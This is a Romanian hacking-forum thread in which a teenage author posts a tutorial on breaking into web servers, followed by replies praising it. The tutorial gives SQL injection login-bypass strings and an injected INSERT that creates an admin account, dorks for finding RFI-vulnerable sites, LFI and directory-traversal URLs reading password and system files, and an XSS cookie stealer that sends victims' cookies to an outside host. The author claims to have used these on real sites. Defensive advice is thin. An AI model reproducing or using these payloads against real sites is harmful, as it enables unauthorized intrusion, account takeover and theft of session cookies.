Hacking and more...
HaCkinG CulT
Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.
Nou pe simpatie:
Dimitriu livia la Simpatie.ro
Femeie
24 ani
Bucuresti
cauta Barbat
26 - 55 ani
Hacking and more... / Hacking-ul nostru cel de toate zilele / Cele mai folosite Metode pentru a penetra un web-server Moderat de Shocker
Autor
Mesaj Pagini: 1
flo_flow
Vizitator



====Cele mai folosite Metode pentru a penetra un web-server====
                             Tutorialul meu despre securitate
                                             By fl0 fl0w

Cuprins


1)Disclaimer
---------------------------
2)Hackers Manifesto
---------------------------
3)Introducere
---------------------------
4) SQL Injection –login bypass
---------------------------
5) SQL Injection –table modification
---------------------------
6)RFI
---------------------------
7)LFI
---------------------------
8) RAFD
---------------------------
9)XSS
---------------------------
10)NULL byte-CGI Exploitation
---------------------------
11) Directory Transversal
---------------------------
12)Surse : video + papers +articles +books
---------------------------
13)About me
================
1)Disclaimer

*Acest tutorial este destinat invatarii ,a cunoasterii aprofundate a securitatii web-serverelor;
*NU raspund de ceea ce faceti dupa ce ati dobandit aceste cunostinte;
*Materialul acesta nu poate fi multiplicat sau distribuit fara permisiunea autorului;
2)Hackers Manifeto

Sunt aici pentru a exploata,pentru a invata cum functioneaza lucrurile.Mereu mi-am pus intrebari ,mereu am cautat mai mult de doua raspunsuri.
Singura crima a mea este aceea a curiozitatii,explorez ceea ce tu vizezi ,sunt peste vointa,peste ambitie,peste tot.Daca vrei sa patrunzi in aceasta lume ,detaseaza-te de tot,uita tot ce ai invatat de la cei ignoranti si fara interes ,si invata sa faci cea ce vrei.
In underground de 4 ani ,de la primul contact cu un computer acum 10 ani , am ramas profound impresionat de multitudinea de cai ce le deschide.
Nu ma cunosti ,nu ai dreptul sa ma judeci.
Daca citind aceste randuri simti ceva,inseamna ca vorbesc si pentru tine ,daca nu intoarce privirea si indreapta-te spre lumea de rand.
Pentru mine este o intreaga filozofie ,”the computer system theory”,te manipulez chiar si in acest moment.
Trebuie sa ne ajutam intre noi ,nu invers ,daca simti asta vorbeste-mi daca nu pleaca.
Din nimic eu fac totul ,si din totul nimic,multumesc tuturor celor care m-au ajutat si ma ajuta,iar celor care au avut alte intentii mai putin bune ,think again motherfuckers.
This is my manifesto !
Eu sunt fl0 fl0w si sunt un hacker.

3)Tutorialul va fi structurat pe doua directii : vulnerabilitati si repararea lor.
  Multi care fac tutoriale nu fac decat sa dea din gura ,eu o sa aplic cateva metode pe parcurs ce le explic si prezint.Nu ma consider specialist ,nu stiu cum sunt privit dar nu asta este important.Unde scrie LIVE demonstration acolo am aplicat metoda pe diferite siteuri web,in functie de cum am gasit in momentul respectiv.
  Puteti downloada acest tutorial in format PDF impreuna cu screenshoturile de la LIVE demonstration de la urmatorul link :

4)      ::::Metoda explicata cu LIVE demonstration::::
SQL Injection este metoda care exploateaza erorile din codul aplicatiilor si permite atacatorului sa injecteze comenzi SQL in formele de login  feedback forms,cu scopul obtinerii accesului la informatiile din baza de date.SQL Injection functioneaza deoarece formele de imput permit expresii SQL sa patrunda direct in baza de date.
Construind programme cu SQL pentru a manipula comenzile din baza si in acest fel capatand acces.
Cea mai folosita este SQL login bypass ,injectand in sectia de login si password.

Code:

Exemplu : ‘ OR 1=1—
                      Schema URL: http://site.com/index.php?id=0 ‘ OR 1=1—
  Alte comenzi : admin’—
                           ‘ OR 0=0—
                            “ OR=0—
                             OR 0=0—
                        ‘ HI OR 1=1—
              " or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

Cautam astfel de siteuri cu urmatoarele  dorkuri :
”adminlogin.asp”
”login.asp”
Cum sa te aperi de astfel de atacuri.
Sistemul trebuie evaluat pentru orice fel de vulnerabilitate ,codurile trebuie sa fie bug free ,si aplicatiile si tot ce face parte din infrastructura bine satinizate.
La fiecare schimbare a componentelor trebuie facut un web security audit.
Nu are rost sa intru in detalii si in plus nu cunosc indeajuns de mult baza SQL,insa daca nu aveti o infrastructura complexa de care sa aveti grija nici nu se merita sa va complicati.
















LIVE demonstration



Username: ' or '='
Password: ' or '='



5) SQL Injection –table modification
Cream un account cu drepturi maxime.
Aceasta metoda cuprinde 3 pasi : generarea unei erori care trebuie inteleasa ,apoi obtinerea unei alte erori pentru a vedea un anumit table name,si injectarea unor comenzi pentru creearea contului.

La username  : ‘ HAVING 1=1
Eroarea trebuie sa contina un table name : user_member.id .
  Apoi injectarea comenzilor :  ‘UNION SELECT * FROM user_member WHERE USER_ID=’ADMIN’ GROUP BY USER_ID HAVING 1=1;--
Dupa generarea erorii incercam :

Code:

‘INSERT INTO USER_MEMBER(USER_NAME,LOGIN_ID,PASSWORD,CREATION_DATE)VALUES(‘HACKER’,’HACKED’,’HCKED’,GETDATE());--
Ne putem loga cu -userul :          hacker
                                Password :     hacked

6)  ::::Metoda explicata cu LIVE demonstration::::
In aceasta metoda incercam sa uploadam un fisier ,un emulator de shell in web page.Atunci cand web siteul face apel catre alta pagina pentru a fi afisata insa noi vom construi o shema URL prin care vom introduce emulatorul ,capatand acces la intregul server.
Aceasta vulnerabilitate este  mult mai complexa decat va imaginati ,cea ce prezint eu este metoda cea mai populara sa zic asa ,cea mai usoara ,dar apar zilnic zeci de tipuri de RFI asa ca documentati-va mult mai mult.

Le gasi cu urmatorele  dorkuri : inurl :”index.php?page=”
includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
Testam : se deschide pagina google in cadrul siteului respective,acesta este vulnerabil.








LIVE demonstration
Tinta :




7)LFI ::::Metoda explicata cu LIVE demonstration::::
O problema in coduri poate avea consecinte ,aceasta metoda poate sa derive in CGI exploatation.
  In principal se aseamana cu RFI.
In live demonstration am accesat folderol  /passwd din sistemul unix.Simplu,banal oricine poate face o schema URL ,dupa ce a scanat sa zicem siteul si poc ! se crede mare hacker,cand nu e deloc asa ,trebuie inteles codul ,DE CE se intampla asta.
<a href=index.php?page=file1.php>Files</a>
<?php
$page = $_GET[page];
include($page);
?>

Exemplu de eroare : $page input  nu e satinizata.
Acest bug fiind pe un server unix am putut accesa folderol cu parole

LIVE demonstration



Continutul este criptat,de cele mai multe ori nu ai ce face ,dar poti incerca cu metoda brute force.Eu am folosit Brutus si am cautat spre exemplu pass’uri pentru conturi FTP,etc depinde cum ai noroc acum.
Victima :
Schema folosita :

8)RAFD ::::Metoda explicata cu LIVE demonstration::::
Mergem mai mult la blind ,pentru ca in general este un password disclosure.Accesam anumite directoare din server ,si tintim la fel folderol cu pass sau folderol adminului etc.
Remote Admin File Desclosure : watch and learn !

LIVE demonstration




Victima :
Schema :
Mai am exemple postate de mine pe alte forumuri unde am obtinut informatii klumea.

9)XSS ::::Metoda explicata cu LIVE demonstration::::
Toata lumea mai nou crede ca daca poate injecta un script intr-un form a facut cine stie ce hack.Nu nu a reusit nimic,nu a obtinut acces nicaieri ,nu a obtinut informatii sensibile ,nimic ,nu e un hack.Toti lamerii se grabesc sa se laude cand au gasit aceasta vulnerabilitate.
Am sa va explic ce inseamna si cum putem capata acces la informatii pentru a putea face un cont cu privilegii.
Am sa explic cu cookies’urile cum sta treaba ,cum sa faceti un script folosind php ,cum sa testati siteul.
Pentru a testa daca este vulnerabil ,cautati exact ca la SQL Injection in aceleasi form’uri.
Si incercati sa injectati scripturi,cel mai banal fiind : <script>alert(‘XSS whole’)</script>
Veti vedea un alert window cu textul “xss whole “ ,bun acum stiti ca puteti modifica in interior prin comenzi.Acum vom face un cookie stealer apoi va arat cum sa cautati cookiuri direct printr-o schema URL.
Dupa ce testam cu scriptul : script>alert(‘XSS whole’)</script> ,daca e vulnerabil injectam urmatorul cod, exact ca la metoda sql injection.

Code:

<?php
$cookie=$_GET[‘cookie’];
$variabila1=fopen(“cookies.txt”,”a”);
fwrite($variabila1,$cookie);
f.close($variabila1);
Salvati : jucarie.php
Apoi facem un alt script pentru a putea “planta” jucaria facuta,asta dupa ce ati uploadat pe un host.
<script>window.location=’http://site.com/jucarie.php?cookie=’+’document.cookie;</script>

LIVE demonstration



Victima :
Schema :

10)NULL byte-CGI Exploitation

CGI bin (sau Common Gateway Interface) este un director care se gaseste pe serverele web si care permite utilizarea fisierelor .cgi si .pl. Script-urile/fisierele CGI sunt utilizate pentru statistici, guestbook-uri, formulare de raspuns si baze de date.
NULL byte este un string folosit in programare care anunta finalul unui string.Pagina CGI  acceseaza alte pagini :
                Index.cgi?pageid=2
Arata pagina 2.html,dar modificam putin :
     
                Index.cgi?pageid.cgi%00
Am pus NULL byte si termina tot in url.Acum facem urmatoarea schema :

                Index.cgi?pageid=/etc/passwd%00

11) Directory Transversal
11) Directory Transversal este un exploit HTTP care permite atacatorului sa acceseze directoare din interiorul serverului la care evident nu ar trebui sa aibe acces si sa execute comenzi in rootul serverului.
·    Access Control Lists (ACLs)
·    Root directory
Sunt doua protocoale de securitate folosite pe un server.In Access Control Lists administratorul limiteaza userii si configureaza in mare cam tot.Root directory impiedica userii sa acceseze fisiere ce detin informatii sensibile cum ar fi CMD pe platforma Windows si folderul passwd pe Linux/UNIX.
Un web server vulnerabil poate compromite tot.

Ok ce tocmai am facut : schema url face face o cerere catre pagina show.asp din server si trimite parametrul view cu valoarea =../../../../../Windows/system.ini

../    -reprezinta directorul si folosita in schema URL spune serverului sa ne duca cu un director in sus.

Alta schema ar fi :

http:/site.com/scripts/..%5c../Windows/System32/
cmd.exe?/c+dir+c:

12) VIdeo :
                 
                 
                 ~500-600 de tutoriale~.
                Papers:
             ~Cateva mii de cart~.
fl0 fl0w © 2oo7

13)About me
Am 18 ani,invat intr-un Colegiu National de undeva din tara ,invat sisteme –computere de cand ma stiu,programare si altele.
Sunt unul din cei 9 membri  ai Romanian Electronic Network Security Lab Team.Activez pe hackgroup team.
Imi plac jocurile,fotbalul si altele.
---------------------------
Tutoriale scoase: *C++{ introduction}          ŕDownload   


                            *networking                        ŕDownload

*networking 2.1                   ŕDownload
*networking 2.2                   ŕDownload
* Nume de cod  &[$ 'TEORIA 7 28 14 7 21 18 22 '$]&   -introducere in criptografie si cracking.        ŕDownload
* Virusii                               ŕDownload


pus acum 17 ani
   
Xtr3M.
elite user

Din: fata monitorului
Inregistrat: acum 17 ani
Postari: 1015
Bravo!

_______________________________________
e-mail: xtr3m[at]pscomp[DOT]com

pus acum 17 ani
   
ady1266
Elite Member

Din: Bacau
Inregistrat: acum 17 ani
Postari: 1132
bravo !cred k a durat ceva timp sal faci!my respect

_______________________________________


pus acum 17 ani
   
flo_flow
Vizitator



Mersi! mi-a luat cam 4-5 ore,cititi cu atentie.

pus acum 17 ani
   
vgteam
Grand Master

Inregistrat: acum 17 ani
Postari: 219
nota 10 pentru un prieten de nota 10

_______________________________________
HACKPEDIA project
stage: strangerea de fonduri :d

pus acum 17 ani
   
tw8
Elite Member

Din: Drobeta Turnu Severin
Inregistrat: acum 17 ani
Postari: 1087
Bravo, imi place. Acum iau si pdf-ul ca nu strica sa il am si in calculator :-).

_______________________________________



pus acum 17 ani
   
hacker_D
Grand Master

Din: De la voi de pe undeva
Inregistrat: acum 17 ani
Postari: 325
Bravo ! dar totusi am o intrebare... ai supus :

Code:

Testam : http://site.com/[b]director_vulnerabil.php[/b] ... e.com,daca se deschide pagina google in cadrul siteului respective,acesta este vulnerabil.

de unde stim care e directorul vulnerabil?? trebuie sa cautam tot situl ?

Modificat de hacker_D (acum 17 ani)


_______________________________________
cel mai bun cracker a fost prins... merita sa vezi

pus acum 17 ani
   
flo_flow
Vizitator



Da de obicei cauti in sursa toate legaturile ,linkurile si te orientezi.

pus acum 17 ani
   
dark_fabian
Old School Member

Din: Giran Castel Town
Inregistrat: acum 17 ani
Postari: 485
good job

_______________________________________


pus acum 17 ani
   
andrewboy
Grand Master

Inregistrat: acum 17 ani
Postari: 330
da flow good job

_______________________________________
---ziceti-mi parerea voastra despre chat

pus acum 17 ani
   
Mail-Man
postas

Din: sicriu -> Am murit !!!!
Inregistrat: acum 17 ani
Postari: 561
fain toti inteleg ....
tre sa fie prea stupid ca sa nu intelegi 
nota 10 de la mine
ar fu fiost mai fain daca faceai un tutorial .pdf

Modificat de Mail-Man (acum 17 ani)


_______________________________________


Am murit nu ma contactati voi ca va contactez eu ... . Cea mai buna munca o fac offline ! ASTEA SUNT PRINTRE ULTIMILE MELE POSTURI !!!

pus acum 17 ani
   
tw8
Elite Member

Din: Drobeta Turnu Severin
Inregistrat: acum 17 ani
Postari: 1087

Mail-Man a scris:

ar fu fiost mai fain daca faceai un tutorial .pdf

Asta vrea sa fie o afirmatie idioata ?? Vezi ca a pus mai sus linkul de la versiunea .pdf


_______________________________________



pus acum 17 ani
   
Mail-Man
postas

Din: sicriu -> Am murit !!!!
Inregistrat: acum 17 ani
Postari: 561
sint chior asta e am vazut si eu acuma 

_______________________________________


Am murit nu ma contactati voi ca va contactez eu ... . Cea mai buna munca o fac offline ! ASTEA SUNT PRINTRE ULTIMILE MELE POSTURI !!!

pus acum 17 ani
   
tw8
Elite Member

Din: Drobeta Turnu Severin
Inregistrat: acum 17 ani
Postari: 1087

Mail-Man a scris:

sint chior asta e am vazut si eu acuma 

Stai ma nu te supara, am fost doar un pic ironic :P.


_______________________________________



pus acum 17 ani
   
ady1266
Elite Member

Din: Bacau
Inregistrat: acum 17 ani
Postari: 1132

tw8 a scris:


Mail-Man a scris:

sint chior asta e am vazut si eu acuma 

Stai ma nu te supara, am fost doar un pic ironic :P.

ironic esti cam tot timpul!


_______________________________________


pus acum 17 ani
   
Mail-Man
postas

Din: sicriu -> Am murit !!!!
Inregistrat: acum 17 ani
Postari: 561
merita pus sus topicu parerea mea ...

_______________________________________


Am murit nu ma contactati voi ca va contactez eu ... . Cea mai buna munca o fac offline ! ASTEA SUNT PRINTRE ULTIMILE MELE POSTURI !!!

pus acum 17 ani
   
ady1266
Elite Member

Din: Bacau
Inregistrat: acum 17 ani
Postari: 1132
de acord cu tine!acest tutorial e pe intelesul tuturor

_______________________________________


pus acum 17 ani
   
koderS
Membru nou

Din: Craiova
Inregistrat: acum 17 ani
Postari: 1
uhm, am vazut acelasi lucru pe milw0rm la video cel putin poti pune acolo ca ai copiat de pe milw0rm .

_______________________________________
<?
$name = "Cristian";
echo "Now we can use $name";
?>

pus acum 17 ani
   
Imperfect
Little Kevin

Inregistrat: acum 17 ani
Postari: 57

koderS a scris:

uhm, am vazut acelasi lucru pe milw0rm la video cel putin poti pune acolo ca ai copiat de pe milw0rm .

DOH !
Pot sa spun ca primul tau post , e de kkt ! , scuze expresia .
Bre , daca ai vazut ceva din tutorialul acesta pe milw0rm la video , inseamna ca a copiat de acolo ? :O
Uita-te pe siteuri de "hacking" si vei vedea ca pe orice site , se discuta de aceleasi metode . Shit.


_______________________________________
Imperfect-><-TE4L & epic[TE4L , stiu ca ai ceva cu mine, da dai si tu mai usor ]


pus acum 17 ani
   
BlueWonder
Senior

Din: Mirage Town
Inregistrat: acum 17 ani
Postari: 112
pai si el ce se face daca e interesat sa "hackuiasca" frigiderul? mai schimbati si voi subiectele intre forumuri     

_______________________________________
The question remains unanswered...Who can save the humanity from itself?



pus acum 17 ani
   
Imperfect
Little Kevin

Inregistrat: acum 17 ani
Postari: 57

BlueWonder a scris:

pai si el ce se face daca e interesat sa "hackuiasca" frigiderul? mai schimbati si voi subiectele intre forumuri     


Bai fratilor , pastram si noi forum curat ,sau ne apucam sa facem nu mai posturi inutile ?!


_______________________________________
Imperfect-><-TE4L & epic[TE4L , stiu ca ai ceva cu mine, da dai si tu mai usor ]


pus acum 17 ani
   
doftorul
Membru nou

Din: Bangkok
Inregistrat: acum 17 ani
Postari: 4
Foarte bune tuts pentru a intelege XSS si Injex dar totusi, ca sa obtii acces intr-un site "that matters" e mai complicat, in primul rand pentru ca se folosesc framework-uri la partea de scripting si care se ocupa in general de stringuri care pot poza injectii si mai ales de XSS. In ultima vreme cam tot ce e content care conteaza foloseste o arhitectura MVC si e destul de dificil sa ajungi la modelele care scot /scriu date. Devine si mai complicat cand userii care au grant-uri pe baze sunt limitati strict la update-uri in baza cu pricina. Pentru SQL-uri se poate face mai multa treaba cu heap-uri trimise direct in 3306 sa faca serverul un pic de buba si apoi sa incerci sa vezi ce si cum fac formurile pe care vrei sa le injectezi incercand sa intelegi arhitectura din error-urile sau time-out-urile pe care le dropuie.

_______________________________________
Fide Sed Cui Vide

pus acum 17 ani
   
sergyu1
Grand Master

Din: Curiozitate
Inregistrat: acum 17 ani
Postari: 266
caut asta de mult timp da nu cred ca am rabdare dupa cat am vz ca scrie bv pt tut

_______________________________________
Dont put more idiot questions and search Google...
Today Google is you'r friend search him...
Enter here for other forum for hack with lots of things 

pus acum 17 ani
   
sergyu1
Grand Master

Din: Curiozitate
Inregistrat: acum 17 ani
Postari: 266
am citit tot da nu m-am prins cum se face ( is mai noob da e tare am inteles aproape tot

_______________________________________
Dont put more idiot questions and search Google...
Today Google is you'r friend search him...
Enter here for other forum for hack with lots of things 

pus acum 17 ani
   
cabron-echo-ebola
Grand Master

Din: root
Inregistrat: acum 17 ani
Postari: 305
eu am o lene sa citesc atataaaaaa ....dar imi fac acum curaj si citesc si eu

_______________________________________
Hacking is the way ...

pus acum 17 ani
   
cabron-echo-ebola
Grand Master

Din: root
Inregistrat: acum 17 ani
Postari: 305
nu pot intelege nimic ! :| sunt eu noob ...dar nu inteleg deloc  ! :| 

_______________________________________
Hacking is the way ...

pus acum 17 ani
   
sergyu1
Grand Master

Din: Curiozitate
Inregistrat: acum 17 ani
Postari: 266
nici eu nam inteles nik da am zis asa sal incurajez)      

_______________________________________
Dont put more idiot questions and search Google...
Today Google is you'r friend search him...
Enter here for other forum for hack with lots of things 

pus acum 17 ani
   
cabron-echo-ebola
Grand Master

Din: root
Inregistrat: acum 17 ani
Postari: 305
:d poate imi explica si mie mai mota mo dar nu se stie ... ideea e ca e super facut ..dar dificil de inteles pe unu ca mine    


cine stie ..odata si odata intelegem noi ... 


_______________________________________
Hacking is the way ...

pus acum 17 ani
   
Pagini: 1  

Mergi la